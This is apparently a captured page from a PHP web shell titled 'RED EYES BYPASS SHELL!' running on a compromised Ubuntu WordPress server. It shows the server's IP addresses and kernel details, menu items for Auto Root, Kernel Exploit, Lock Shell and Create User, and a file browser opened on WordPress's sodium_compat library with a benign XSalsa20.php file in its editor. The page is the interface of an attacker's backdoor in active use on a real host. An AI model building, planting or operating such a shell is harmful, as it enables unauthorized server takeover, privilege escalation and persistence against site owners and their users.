Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
techno /
wp-includes /
sodium_compat /
src /
Core32 /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
ChaCha20
[ DIR ]
drwxr-xr-x
Curve25519
[ DIR ]
drwxr-xr-x
Poly1305
[ DIR ]
drwxr-xr-x
SecretStream
[ DIR ]
drwxr-xr-x
BLAKE2b.php
21.8
KB
-rwxr-xr-x
ChaCha20.php
14.17
KB
-rwxr-xr-x
Curve25519.php
129.86
KB
-rwxr-xr-x
Ed25519.php
15.37
KB
-rwxr-xr-x
HChaCha20.php
5.17
KB
-rwxr-xr-x
HSalsa20.php
6.78
KB
-rwxr-xr-x
Int32.php
24
KB
-rwxr-xr-x
Int64.php
30.44
KB
-rwxr-xr-x
Poly1305.php
1.55
KB
-rwxr-xr-x
Salsa20.php
11.24
KB
-rwxr-xr-x
SipHash.php
6.46
KB
-rwxr-xr-x
Util.php
209
B
-rwxr-xr-x
X25519.php
10.78
KB
-rwxr-xr-x
XChaCha20.php
2.4
KB
-rwxr-xr-x
XSalsa20.php
1.35
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : XSalsa20.php
<?php if (class_exists('ParagonIE_Sodium_Core32_XSalsa20', false)) { return; } /** * Class ParagonIE_Sodium_Core32_XSalsa20 */ abstract class ParagonIE_Sodium_Core32_XSalsa20 extends ParagonIE_Sodium_Core32_HSalsa20 { /** * Expand a key and nonce into an xsalsa20 keystream. * * @internal You should not use this directly from another application * * @param int $len * @param string $nonce * @param string $key * @return string * @throws SodiumException * @throws TypeError */ public static function xsalsa20($len, $nonce, $key) { $ret = self::salsa20( $len, self::substr($nonce, 16, 8), self::hsalsa20($nonce, $key) ); return $ret; } /** * Encrypt a string with XSalsa20. Doesn't provide integrity. * * @internal You should not use this directly from another application * * @param string $message * @param string $nonce * @param string $key * @return string * @throws SodiumException * @throws TypeError */ public static function xsalsa20_xor($message, $nonce, $key) { return self::xorStrings( $message, self::xsalsa20( self::strlen($message), $nonce, $key ) ); } }
Close